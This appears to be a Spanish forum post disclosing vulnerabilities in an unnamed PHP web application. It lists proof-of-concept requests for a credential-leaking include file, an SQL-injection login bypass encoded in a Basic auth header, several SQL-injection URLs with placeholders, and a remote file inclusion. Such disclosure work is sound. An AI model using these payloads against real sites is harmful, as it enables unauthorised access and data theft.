Pfff multiples vulnerabilidades.
1.- Sensitive Information Disclosure
Código:
PoC:
http://www.server.com/inc/lib.inc
Contiene la server de la BD, el nombre de usuario y pass, y muchas mas xDhttp://www.server.com/inc/lib.inc
2.- SQL injection
Código:
PoC:
GET /admin.php HTTP/1.1
Host: www.server.com
Authentication: Basic: YWRtaW4nIE9SIDE9MS8qOnA=
GET /admin.php HTTP/1.1
Host: www.server.com
Authentication: Basic: YWRtaW4nIE9SIDE9MS8qOnA=
3.- SQL injection
Código:
http://www.server.com/signup.php?signup=1&user_pw=2&passwordconfirm=2&user_name=3&name=3&email=3&site_url=3&site_name='[SQL]/*
4.- SQL injection **** AUN CON MAGIC ON ****
Código:
GET /admin.php?activatebanner&id=-1%20[SQLi] HTTP/1.1
Host: www.server.com
Authentication: Basic: YWRtaW4nIE9SIDE9MS8qOnA=
Host: www.server.com
Authentication: Basic: YWRtaW4nIE9SIDE9MS8qOnA=
Mismo bug pero con comilla en contexto SELECT:
/admin.php?activateuser&id='+[SQL]
/admin.php?deleteunuser&id='+[SQL]
/admin.php?deleteuserbanner&deleteuserbanner='+[SQL]
/admin.php?deleteuserbanner&deleteuserbanner='+[SQL]
/admin.php?viewmem&viewmem='+[SQL]
/admin.php?viewmemunb&viewmemunb='+[SQL]
/admin.php?viewunmem&viewunmem='+[SQL]
Mismo bug, en contexto de DELETE:
/admin.php?deletebanner&id=-1+[SQL]
/admin.php?activateuser&deleteuser='+[SQL]
/admin.php?deleteuserbanner&deleteuserbanner='+[SQL]
Remote File Inclusion:
Código:
http://www.server.com/members.php?cfg_root=http://www.google.com/?
Me impresiona que existan estos programas en internet..
la verdad esque los escojo al azar de sourceforge y hotscripts.. y todos tienen algo.. xD
Ma�ana voy por algo mas popular

Saludos!!










Autor




En línea
